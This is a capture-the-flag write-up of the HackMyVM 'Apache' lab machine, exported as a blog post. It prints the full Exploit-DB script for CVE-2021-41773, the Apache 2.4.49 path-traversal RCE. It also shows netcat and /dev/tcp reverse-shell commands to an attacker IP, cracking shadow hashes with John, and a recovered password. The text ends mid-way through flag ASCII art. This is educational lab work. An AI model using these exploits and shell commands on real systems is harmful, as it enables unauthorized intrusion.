{"id":592,"date":"2024-04-20T14:11:20","date_gmt":"2024-04-20T06:11:20","guid":{"rendered":"http:\/\/162.14.82.114\/?p=592"},"modified":"2024-04-20T14:11:20","modified_gmt":"2024-04-20T06:11:20","slug":"hmv-_-apache","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/592\/04\/20\/2024\/","title":{"rendered":"hmv[-_-]Apache"},"content":{"rendered":"<h1>Apache<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404201410306.png\" alt=\"image-20240420131606425\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404201410308.png\" alt=\"image-20240420131636902\" style=\"zoom:50%;\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.0.160 -- -A\n\nOpen 192.168.0.160:22\nOpen 192.168.0.160:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 bc:95:83:6e:c4:62:38:b5:a9:94:0c:14:a3:bf:57:34 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDjZp8atO6vRCTGOwqjuGUngbAF\/pL+YzqIobqPQsc\/wnyLRxtduhFvm775wt5E6nrKoeL+EuxO4R3+XAXQq7nRLP9+DcIa03uljeLGGXMRzDQDtz2sQoilqFRn35GCQFiY8mqzEHlGpSptn1aDJLeoyihr\/\/L4UzsT2AH5IqxI234Q0zgbwj2mHRpZTPQM7AbXQxnHOMGgAnT23pJIcjzt5OIvzIZi79hlPbn+CS2VoSq7lSgmQPB8Rp6FwzS92xXNgy4tA+rAKwx8cPdVOxsozZWkJ51gE1QQ5e7WYJz2t2LdCQKXhXZ1GEHniFuSXZwvpp1MPXch\/yCdbAwmWej3G2Dp8ScAnnsSBSh3LXM4VewreIXNSgAI67F1TQgqiRXWGpvHrLtAdGsTAqbZg68S9Mah0UxQXNXzZ5WOp5ZWjNkxTOoZri5AINMPrfin2Tyg1PM3qUEcY0ANQu+UUSIKVnJcDeOy2cd3RfZ3cikzfEfu0sc9B1ijp6K0m5hOtB8=\n|   256 07:fa:46:1a:ca:f3:dc:08:2f:72:8c:e2:f2:2e:32:e5 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLlz0auLlfftjw5PJX6I+LJqXUfVgWqSmETd5Ts1LJLEVBrMTX4wXnWmTSOgcy8sSA0E1jTbKReY5ejsYU9INnI=\n|   256 46:ff:72:d5:67:c5:1f:87:b1:35:84:29:f3:ad:e8:3a (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILe1GYTzyP9hWtrRQ0N29auVmnYHAmOYD0RtKhy4uv4U\n80\/tcp open  http    syn-ack Apache httpd 2.4.49 ((Unix))\n|_http-favicon: Unknown favicon MD5: EB49C4A639D3960EE7DDD07BC9F832B7\n| http-methods: \n|   Supported Methods: POST OPTIONS HEAD GET TRACE\n|_  Potentially risky methods: TRACE\n|_http-server-header: Apache\/2.4.49 (Unix)\n| http-robots.txt: 1 disallowed entry \n|_\/\n|_http-title: Apaches\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.160\/ -w 
\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.160\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              zip,git,jpg,txt,png,php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/images               (Status: 301) [Size: 236] [--&gt; http:\/\/192.168.0.160\/images\/]\n\/css                  (Status: 301) [Size: 233] [--&gt; http:\/\/192.168.0.160\/css\/]\n\/js                   (Status: 301) [Size: 232] [--&gt; http:\/\/192.168.0.160\/js\/]\n\/robots.txt           (Status: 200) [Size: 116]\n\/fonts                (Status: 301) [Size: 235] [--&gt; http:\/\/192.168.0.160\/fonts\/]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404201410309.png\" alt=\"image-20240420131854939\" style=\"zoom:50%;\" \/><\/p>\n<p>Wow, it is actually Unix!<\/p>\n<p>Looking around:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404201410310.png\" alt=\"image-20240420132229586\" style=\"zoom:50%;\" \/><\/p>\n<p>Four users<\/p>\n<pre><code class=\"language-apl\">Geronimo\nSacagawea\nSquanto \nPocahontas<\/code><\/pre>\n<h3>Sensitive Directories<\/h3>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.160\/robots.txt<\/code><\/pre>\n<pre><code class=\"language-text\">User-agent: *\nDisallow: \/\n\n# IOKAnFlvdSBrbm93IHlvdXIgcGF0aCwgY2hpbGQsIG5vdyBmb2xsb3cgaXQu4oCdCi0tIFBvY2Fob250YXMg<\/code><\/pre>\n<p>Decode it:<\/p>\n<pre><code>From_Base64(&#039;A-Za-z0-9+\/=&#039;,true,false)\n \u201cYou know your path, child, now follow it.\u201d\n-- Pocahontas 
<\/code><\/pre>\n<p>This gives us a user: <code>pocahontas<\/code>.<\/p>\n<h3>Finding a Vulnerability<\/h3>\n<p>Go straight to looking for an Apache vulnerability, since that seems to be what the challenge is hinting at:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404201410311.png\" alt=\"image-20240420132521478\" style=\"zoom:50%;\" \/><\/p>\n<p>Found an RCE vulnerability! Try it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ searchsploit -m multiple\/webapps\/50383.sh\n  Exploit: Apache HTTP Server 2.4.49 - Path Traversal &amp; Remote Code Execution (RCE)\n      URL: https:\/\/www.exploit-db.com\/exploits\/50383\n     Path: \/usr\/share\/exploitdb\/exploits\/multiple\/webapps\/50383.sh\n    Codes: CVE-2021-41773\n Verified: True\nFile Type: ASCII text\nCopied to: \/home\/kali\/temp\/apache\/50383.sh\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ cat 50383.sh \n# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal &amp; Remote Code Execution (RCE)\n# Date: 10\/05\/2021\n# Exploit Author: Lucas Souza https:\/\/lsass.io\n# Vendor Homepage:  https:\/\/apache.org\/\n# Version: 2.4.49\n# Tested on: 2.4.49\n# CVE : CVE-2021-41773\n# Credits: Ash Daulton 
and the cPanel Security Team\n\n#!\/bin\/bash\n\nif [[ $1 == &#039;&#039; ]]; [[ $2 == &#039;&#039; ]]; then\necho Set [TAGET-LIST.TXT] [PATH] [COMMAND]\necho .\/PoC.sh targets.txt \/etc\/passwd\nexit\nfi\nfor host in $(cat $1); do\necho $host\ncurl -s --path-as-is -d &quot;echo Content-Type: text\/plain; echo; $3&quot; &quot;$host\/cgi-bin\/.%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e\/%2e%2e$2&quot;; done\n\n# PoC.sh targets.txt \/etc\/passwd\n# PoC.sh targets.txt \/bin\/sh whoami                                                                                                                                                        \n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ echo &#039;192.168.0.160&#039; &gt; targets.txt       \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ 50383.sh targets.txt \/bin\/bash whoami\n50383.sh: command not found\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ ls\n50383.sh  targets.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ bash 50383.sh targets.txt \/bin\/bash whoami\n192.168.0.160\ndaemon\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ bash 50383.sh targets.txt \/bin\/bash &#039;nc -e \/bin\/bash 192.168.0.143 1234&#039;\n192.168.0.160\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ bash 50383.sh targets.txt \/bin\/bash &#039;bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/192.168.0.143\/1234 &lt;&amp;1&#039;&#039;\nzsh: no such file or directory: \/dev\/tcp\/192.168.0.143\/1234\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ bash 50383.sh targets.txt \/bin\/bash &#039;bash -c &quot;exec bash -i &amp;&gt;\/dev\/tcp\/192.168.0.143\/1234 &lt;&amp;1&quot;&#039;\n192.168.0.160<\/code><\/pre>\n<p>Success!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404201410313.png\" alt=\"image-20240420133004011\" style=\"zoom:50%;\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) daemon@apaches:\/usr\/bin$ cd \/home\n(remote) daemon@apaches:\/home$ ls -la\ntotal 24\ndrwxr-xr-x  6 root       root       4096 Oct  9  2022 .\ndrwxr-xr-x 20 root       root       4096 Sep 30  2022 ..\ndrwxr-xr-x  4 geronimo   geronimo   4096 Jul 13  2023 geronimo\ndrwxr-xr-x  3 pocahontas pocahontas 4096 Oct 10  2022 pocahontas\ndrwxr-xr-x  6 sacagawea  sacagawea  4096 Jul 13  2023 sacagawea\ndrwxr-xr-x  4 squanto    squanto    4096 Oct 10  2022 squanto\n(remote) daemon@apaches:\/home$ cd geronimo\/\n(remote) daemon@apaches:\/home\/geronimo$ ls -la\ntotal 32\ndrwxr-xr-x 4 geronimo geronimo 4096 Jul 13  2023 .\ndrwxr-xr-x 6 root     root     4096 Oct  9  2022 ..\n-rw------- 1 geronimo geronimo    0 Jul 13  2023 .bash_history\n-rw-r--r-- 1 geronimo geronimo  220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 geronimo geronimo 3771 Feb 25  2020 .bashrc\ndrwx------ 2 geronimo geronimo 4096 Sep 30  2022 .cache\ndrwxrwxr-x 3 geronimo geronimo 4096 Oct 10  2022 .local\n-rw-r--r-- 1 geronimo geronimo  807 Feb 25  2020 .profile\n-rw-r--r-- 1 geronimo geronimo    0 Oct  1  2022 .sudo_as_admin_successful\n-rw------- 1 geronimo geronimo 3827 Oct 10  2022 user.txt\n(remote) 
daemon@apaches:\/home\/geronimo$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-timesync:x:102:104:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:106::\/nonexistent:\/usr\/sbin\/nologin\nsyslog:x:104:110::\/home\/syslog:\/usr\/sbin\/nologin\n_apt:x:105:65534::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:106:111:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nuuidd:x:107:112::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:108:113::\/nonexistent:\/usr\/sbin\/nologin\nlandscape:x:109:115::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:110:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:111:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core 
Dumper:\/:\/usr\/sbin\/nologin\ngeronimo:x:1000:1000:geronimo:\/home\/geronimo:\/bin\/bash\nlxd:x:998:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\nsquanto:x:1001:1001:,,,:\/home\/squanto:\/bin\/bash\nsacagawea:x:1002:1002:,,,:\/home\/sacagawea:\/bin\/bash\npocahontas:x:1003:1003:,,,:\/home\/pocahontas:\/bin\/bash\n(remote) daemon@apaches:\/home\/geronimo$ cd ..\/\n(remote) daemon@apaches:\/home$ ls -la\ntotal 24\ndrwxr-xr-x  6 root       root       4096 Oct  9  2022 .\ndrwxr-xr-x 20 root       root       4096 Sep 30  2022 ..\ndrwxr-xr-x  4 geronimo   geronimo   4096 Jul 13  2023 geronimo\ndrwxr-xr-x  3 pocahontas pocahontas 4096 Oct 10  2022 pocahontas\ndrwxr-xr-x  6 sacagawea  sacagawea  4096 Jul 13  2023 sacagawea\ndrwxr-xr-x  4 squanto    squanto    4096 Oct 10  2022 squanto\n(remote) daemon@apaches:\/home$ cd pocahontas\/\n(remote) daemon@apaches:\/home\/pocahontas$ ls -la\ntotal 36\ndrwxr-xr-x 3 pocahontas pocahontas  4096 Oct 10  2022 .\ndrwxr-xr-x 6 root       root        4096 Oct  9  2022 ..\n-rw------- 1 pocahontas pocahontas     0 Oct 10  2022 .bash_history\n-rw-r--r-- 1 pocahontas pocahontas   220 Oct  9  2022 .bash_logout\n-rw-r--r-- 1 pocahontas pocahontas  3771 Oct  9  2022 .bashrc\ndrwxrwxr-x 3 pocahontas pocahontas  4096 Oct 10  2022 .local\n-rw-r--r-- 1 pocahontas pocahontas   807 Oct  9  2022 .profile\n-rw------- 1 pocahontas pocahontas 10267 Oct 10  2022 user.txt\n(remote) daemon@apaches:\/home\/pocahontas$ cd ..\/        \n(remote) daemon@apaches:\/home$ cd sacagawea\/\n(remote) daemon@apaches:\/home\/sacagawea$ ls -la\ntotal 48\ndrwxr-xr-x 6 sacagawea sacagawea 4096 Jul 13  2023 .\ndrwxr-xr-x 6 root      root      4096 Oct  9  2022 ..\n-rw------- 1 sacagawea sacagawea    0 Oct 10  2022 .bash_history\n-rw-r--r-- 1 sacagawea sacagawea  220 Oct  9  2022 .bash_logout\n-rw-r--r-- 1 sacagawea sacagawea 3771 Oct  9  2022 .bashrc\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Oct 10  2022 .local\n-rw-r--r-- 1 sacagawea sacagawea  807 Oct  9  2022 
.profile\n-rw-rw-r-- 1 sacagawea sacagawea   66 Oct 10  2022 .selected_editor\ndrwxrwxr-x 2 sacagawea sacagawea 4096 Apr 20 05:30 Backup\ndrwxrwxr-x 7 sacagawea sacagawea 4096 Oct 10  2022 Development\ndrwxrwxr-x 2 sacagawea sacagawea 4096 Oct 10  2022 Scripts\n-rw-rw---- 1 sacagawea sacagawea 5899 Jul 13  2023 user.txt\n(remote) daemon@apaches:\/home\/sacagawea$ cd Backup\/\n(remote) daemon@apaches:\/home\/sacagawea\/Backup$ ls -la\ntotal 23128\ndrwxrwxr-x 2 sacagawea sacagawea     4096 Apr 20 05:32 .\ndrwxr-xr-x 6 sacagawea sacagawea     4096 Jul 13  2023 ..\n-rwx------ 1 sacagawea sacagawea 23673389 Apr 20 05:32 Backup.tar.gz\n(remote) daemon@apaches:\/home\/sacagawea\/Backup$ tar -zxvf Backup.tar.gz -o \/tmp\/\ntar (child): Backup.tar.gz: Cannot open: Permission denied\ntar (child): Error is not recoverable: exiting now\ntar: Child returned status 2\ntar: Error is not recoverable: exiting now\n(remote) daemon@apaches:\/home\/sacagawea\/Backup$ cd ..\n(remote) daemon@apaches:\/home\/sacagawea$ ls -la\ntotal 48\ndrwxr-xr-x 6 sacagawea sacagawea 4096 Jul 13  2023 .\ndrwxr-xr-x 6 root      root      4096 Oct  9  2022 ..\n-rw------- 1 sacagawea sacagawea    0 Oct 10  2022 .bash_history\n-rw-r--r-- 1 sacagawea sacagawea  220 Oct  9  2022 .bash_logout\n-rw-r--r-- 1 sacagawea sacagawea 3771 Oct  9  2022 .bashrc\ndrwxrwxr-x 3 sacagawea sacagawea 4096 Oct 10  2022 .local\n-rw-r--r-- 1 sacagawea sacagawea  807 Oct  9  2022 .profile\n-rw-rw-r-- 1 sacagawea sacagawea   66 Oct 10  2022 .selected_editor\ndrwxrwxr-x 2 sacagawea sacagawea 4096 Apr 20 05:32 Backup\ndrwxrwxr-x 7 sacagawea sacagawea 4096 Oct 10  2022 Development\ndrwxrwxr-x 2 sacagawea sacagawea 4096 Oct 10  2022 Scripts\n-rw-rw---- 1 sacagawea sacagawea 5899 Jul 13  2023 user.txt\n(remote) daemon@apaches:\/home\/sacagawea$ sudo -l\n[sudo] password for daemon:<\/code><\/pre>\n<p>After several attempts got nowhere, try uploading <code>linpeas.sh<\/code>:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404201410314.png\" alt=\"image-20240420133756701\" style=\"zoom:50%;\" \/><\/p>\n<p>Ah, the shadow file is actually readable...<\/p>\n<h3>Hash Cracking<\/h3>\n<p>Copy it to the local machine and try cracking it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ john hash.txt -w=\/usr\/share\/wordlists\/rockyou.txt\nUsing default input encoding: UTF-8\nLoaded 4 password hashes with 4 different salts (sha512crypt, crypt(3) $6$ [SHA512 256\/256 AVX2 4x])\nCost 1 (iteration count) is 5000 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\niamtheone        (squanto)    <\/code><\/pre>\n<p>Got one user; try connecting over SSH!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404201410315.png\" alt=\"image-20240420134134599\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/apache]\n\u2514\u2500$ ssh squanto@192.168.0.160\nThe authenticity of host &#039;192.168.0.160 (192.168.0.160)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:Rh8fFW5oIyfLABNlGvG850s8cm8NdtrTuTNfdvGyMuY.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;192.168.0.160&#039; (ED25519) to the list of known hosts.\nsquanto@192.168.0.160&#039;s password: \nWelcome to Ubuntu 20.04 LTS (GNU\/Linux 5.4.0-128-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Sat 20 Apr 2024 05:40:39 AM UTC\n\n  System load:  0.01               Processes:               127\n  Usage of \/:   22.5% of 39.07GB   Users logged in:         0\n  Memory usage: 22%                IPv4 address for enp0s3: 192.168.0.160\n  Swap usage:   0%\n\n * Strictly confined Kubernetes makes edge and IoT secure. 
Learn how MicroK8s\n   just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n   https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\n143 updates can be installed immediately.\n2 of these updates are security updates.\nTo see these additional updates run: apt list --upgradable\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nThe programs included with the Ubuntu system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nUbuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by\napplicable law.\n\nsquanto@apaches:~$<\/code><\/pre>\n<p>Connected!<\/p>\n<h4>Information Gathering<\/h4>\n<pre><code class=\"language-bash\">squanto@apaches:~$ ls -la\ntotal 40\ndrwxr-xr-x 5 squanto squanto 4096 Apr 20 05:40 .\ndrwxr-xr-x 6 root    root    4096 Oct  9  2022 ..\ndrwxrwxr-x 2 squanto squanto 4096 Oct 10  2022 backup\n-rw------- 1 squanto squanto    0 Oct 10  2022 .bash_history\n-rw-r--r-- 1 squanto squanto  220 Oct  9  2022 .bash_logout\n-rw-r--r-- 1 squanto squanto 3771 Oct  9  2022 .bashrc\ndrwx------ 2 squanto squanto 4096 Apr 20 05:40 .cache\ndrwxrwxr-x 3 squanto squanto 4096 Oct  9  2022 .local\n-rw-r--r-- 1 squanto squanto  807 Oct  9  2022 .profile\n-rw-rw-r-- 1 squanto squanto  156 Oct 10  2022 todo.md\n-rw------- 1 squanto squanto 2070 Oct  9  2022 user.txt\nsquanto@apaches:~$ cat user.txt \n  ______ _                      __                               _        \n |  ____| |                    \/ _|                             | |       \n | |__  | | __ _  __ _    ___ | |_   ___  __ _ _   _  __ _ _ __ | |_ ___  \n |  __| | |\/ _` |\/ _` |  \/ _ \\|  _| \/ __|\/ _` | | | |\/ _` | &#039;_ \\| __\/ _ \\ \n | |    | | (_| | (_| | | (_) | |   \\__ \\ (_| | |_| | (_| | | | | || (_) |\n |_|    |_|\\__,_|\\__, |  \\___\/|_|   |___\/\\__, |\\__,_|\\__,_|_| 
|_|\\__\\___\/ \n                  __\/ |                     | |                           \n                 |___\/                      |_|                           \n@@@@@@@@&amp;@&amp;@@&amp;&amp;@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%&amp;%#%%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@&amp;@&amp;@&amp;@&amp;@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;#%%%%&amp;&amp;%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@@@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%#(%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@@@&amp;&amp;&amp;@&amp;@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;#((#%#&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@@@&amp;@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%((\/\/..(*,\/,,*.%&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@&amp;@@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;##%#(\/&amp;&amp;&
amp;&amp;&amp;%#\/\/,    &amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@@@@@@@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;((((*&amp;&amp;&amp;%&amp;%%#%((\/((  .\/&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@@@@@&amp;@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;%(((\/\/&amp;&amp;&amp;&amp;&amp;#\/#(\/*\/\/(\/(  ..&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@@@@@@@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;#(\/\/%%&amp;&amp;*..\/%(,.*. .(\/(  ..&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@@@@@&amp;&amp;&amp;&amp;&amp;&amp;&amp;@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\/\/*(&amp;&amp;%%#\/#%&amp;&amp;\/\/**(\/\/(\/\/  .&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@@@@@@@@@@&amp;@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;(,,*&amp;@&amp;&amp;&amp;&amp;&amp;%%&amp;&amp;(\/,((((\/\/(   \/&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;\n@@@@@@@@@&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;&amp;(.  ##%&amp;&amp;\/&amp;&amp;(#*,. 
